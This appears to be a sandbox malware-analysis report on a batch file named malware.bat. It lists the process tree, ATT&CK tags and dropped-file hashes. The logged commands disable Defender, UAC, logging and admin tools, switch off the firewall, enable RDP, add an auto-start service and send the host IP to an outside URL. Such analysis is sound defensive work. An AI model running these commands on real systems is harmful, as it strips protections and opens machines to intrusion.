C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "BVRKIPTS$"2⤵
-
C:\Windows\system32\net.exenet user "BVRKIPTS$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C:2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\malware.bat"1⤵
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.1072⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d5be46f8,0x7ff9d5be4708,0x7ff9d5be47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
System Services
1Service Execution
1Command and Scripting Interpreter
2PowerShell
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD59be60d1c7db05918d977790c37ffd5d5
SHA140653b45e82ba27cc724d8ba45914c45c8503c9d
SHA2564f50b8ee1676079d53210e20b3a10f8f490cead0dbf9ee02238d7dd317f9cdf5
SHA51215f3ea65119d356a1693747c5631838ec79df11525c0320fb0fb37a92241e8073855ec4f44237dec142fab16b7c375bd76cc9d63471cb10d1003a3136dfe6629
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ea9aa3ce07afc05c5a55a0dc4b8aa259
SHA1173d2d3fdc2e466a05f6f3abf4c600499ecb726c
SHA256143914d5a1e62f4329ce51cd5cf73f3a797af5e15eb52cab7fbb1b34395d342a
SHA512d5738c63312647a49d583770eeb8e6eef54687a3b38843e76e30f5f83b9a3d3eb42fb34615ef38878243f0084d8d4753011db15a0ed422cb36e81e1d4f8c5004
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0Filesize
44KB
MD563824a71a00ed81fd38f6be255fc8a7e
SHA1fa3e8bd1ab5c40c460ef92749e4c3633f60d6dd0
SHA256cbabda38d23c0e5b5e50349e00e4e4dc261f90f531100b0b9b78c9b045b74bba
SHA5129249857e1e88d47ae0bc3e862331fb473a8aa0c27311cb62b171af340b97d21e6727ac3bb3589d5ecac4159142c29f96fb8d19c09563d961ceb99008d2054af7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1Filesize
264KB
MD54799fe82b594b04bfd88094bf5a2f9f4
SHA15157a3215683f0144746076e82c6483c95004f49
SHA2563e50847df7025f1a651fe178064c99618a193ff87e9cde19bd7a9ac60537fa45
SHA5120f84d431ac9a907bc5e09f39491c81330244ee75eadb557e72e55d3f027c279da6f867d1add0c32183cd9f09147dd96e3f7308987ac7a471052a6164fc39e045
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3Filesize
4.0MB
MD58cebd8dcf18c86fa1e58edff6616a0e5
SHA194324dc129c519f77e6b671a8cadc572a487998a
SHA2565b6ed02ad2564c85c5f7ce0bdc166b32385cf87aceccc70f1b7d63fb102ad5d2
SHA512d030bf929e31dff89dc00a8bf79b1fd5aaea9091ee3f6f555bf7040697357a842679b0d81733759ec6b565f4cacd1f4798e074ef56dd927825967860ef241e48
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e4339d5560b515fc_0Filesize
12KB
MD5aa4b7ade6722ae2e501cf09cafbed558
SHA1682bc8d738e1f54a7fdcfd0ad937229e3d72dc28
SHA256efc13f834444c8009e5893a07670448ba1d883c0693ac0486d8cd6e6adf35efc
SHA51294fb2451c39bcbe4ab07a17b17a4b9515b9ba8dda27cb6a4c532d249e09b030f21180e0c24b74fb5005ab122dbaad5d6615dd9072f362fbbfea0b682d7c2aa1d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
96B
MD5426547cc28af13318076d5c6981d728f
SHA1bd2eb40dcc2de52b17aac37ffbdfd70d3abc7196
SHA2569d2a193921397e64dbe771656daaa27a098a1d1da0bddfab306e7a415a57561c
SHA512851d7318b56dc3ae5975076199248b3972431876eebd9280f003eafe1fd47bd0beb4a8e8376f4559bb1420d5650440e2ae40392451bad0803d2cfe27d43e4921
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe596da4.TMPFilesize
96B
MD517775f34f6047e340213132f6f776f7e
SHA1665b9276bbe804256e3d000fa15e57e6a4ce2818
SHA256a8e4b42967c629d0ef889866418fc2438f068c2c29b072fc556d65fd59486095
SHA512aef94236e8aad9cd34b07d296192ce563caffeeaa0d68c5377df2b0f15d858bb3d028256716f5ed1e9e8d060f68ad4b96f3524fb51f70144e5c97271d3f1fb21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOGFilesize
322B
MD564e0e9712d064b843dd5dd64c32bf9a9
SHA17f98b2d45556dc5bf098c786ca356d8ed5625a8a
SHA256602e718582115beafb4f94aad2c45d8525d845dddd86c1559ccc3f0b1ee2a415
SHA512a9e058d97bd53d818f980d56a81a701da4cbb5d798436e83404d2e2623c98a6199ca43989ca36ef578653aa883f372f51302982ffccd5767c9d5c112a88b3313
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD59426d59ab9f4657a8ae16cca219e2432
SHA122c6cd0cc631bb8a13fb55f05283c07f7bdd0c20
SHA25689787a5e101c652930563fa23f13da2a9485014f75437db622d5bd480504d7d6
SHA5121a7604f3535ff667e502148e7120d756f6cecbbd663bf819287f751892ebe6e3d174f0aaed305c99bb793b856baf3ae07dbd0f33ae09d955e5b57c7fe9df36df
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journalFilesize
28KB
MD5395ba6f68e4e5a82a24be0f0516c3316
SHA1e2a8558f706bfe5230f658261a2278e60b9b11e3
SHA256e8894266982e7d8091897c7a7bc14384e732a8c392b43c554a24d218b3b49493
SHA512db7c12a65dbd81852456355d04b08edce7d7654a9bea896bebec98ef17376567fd24997a145eb7f21e6126686eb4f83ad4d53993f87d5aa0a544bfb08a3ee1d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
331B
MD507ab06a493c7fe9c0819d5549ed7a6d7
SHA179e0cdca117b7c2ba84e2e931f6e0540163a07e9
SHA2568347da4e6749be9a94c9a69695f6687dd5d7fe759d1f89263cb6cde8a22cee45
SHA51261851d97ca4d31f0662c6df7d687c2a71947bc1d2a36462936a647c69bb72f41da70f0014c510721e0b6a00595ed10919ed95c1f6d3718731db5d01c696b80e2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action PredictorFilesize
36KB
MD5cf4b0a74bdc68a111bd7ccbd8569daa5
SHA1e567e83b8db5476018dfed63802d0f60690c8139
SHA256f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d
SHA5124ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5c6cc333df6b0d3cea41d36e2e39cfc90
SHA1c126b78ba094987560cf19062ab0a6a7f5eafefb
SHA2562be7b557189f01b0d521eec83f18d259883b447a9605633439072aa37eb8f8c8
SHA5129cce3f40b035baa529784e5afcba802a4902910de9b6342922c9298c067846e277cab2a34256e2fba35ab25543891ae43feff64587b83a422a8725d46bcad127
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD538a4dfa40a31160e5af62b5e1854214c
SHA1184a2cc46351eba0057262ade360b08d5ef69161
SHA2568ef34890c9bf32b02c7b7827239e4cba3957cce8bbfd5c40b177a8eeb9976eb2
SHA5127a2fd853fbe10c0524a7aa005e19c66eca0c5e5645c7a457eee74356b5b83caea581c23d16a1a721ab4137a8f4fb4263644ade4ccac0c8179799b13a210787d9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57d24319629a141a490f82c08a2a31272
SHA13ff1727c391ee38c4ca128dca6f76ad72ec37f21
SHA2566eba2178231dba9d7559d98c22cd41915e7134b4b6c1841bf9486c169bf4e91b
SHA5127e215a264d69ea85a099b6f0d966a8997c452f2ed99a11eaa9724bdcf026e6687f7e02683b116fc6ea8112d6076bf31889f59611c80a5f8fceb1c49f23c1ff32
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5af07ef9ad8a24a5506017922725df9ba
SHA10dd98ce60e8c61a04b836d4b1428f081d0dc56d8
SHA25611551cd4295d9e908e6609f6adf03ccd0e95f849506ace45449bce7c4cd197f4
SHA51207ed4f736f0676ca15aed5aab549e666987a338efb64b3763d0ca5b3a4f1480dfe1512c82d271c0ea1e4064b669df8f008b5b1f0c2235a79f1df7cb8140ac0e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredAppsFilesize
33B
MD52b432fef211c69c745aca86de4f8e4ab
SHA14b92da8d4c0188cf2409500adcd2200444a82fcc
SHA25642b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de
SHA512948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360620960277119Filesize
4KB
MD52cb4678f2c5032cae2d6d3dce09c397e
SHA108543758b1f9bc54d90642899878b38e95bb5e0f
SHA2564bf09bd4a0917dbd75e2a492b7d818b0fa12e58013cd869009d8e9ab3de1b16c
SHA512e656d8d42720be26a3f790889f33d94c90c4a4feadb7640d5a03f2e170ea0055e0cd49b18009cc8d1b442be25d5d32e29f91b8b23c93309b45e238ae20312600
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360620960560119Filesize
933B
MD5399f4f47349551c65529f04981abd6c0
SHA1b7db43f5ab8135d5f88ea440b4f646275716b9f2
SHA2567293d04f90f15373da9a5c8713c88c927c98232b90ee692e2ad3f18e8fbaf993
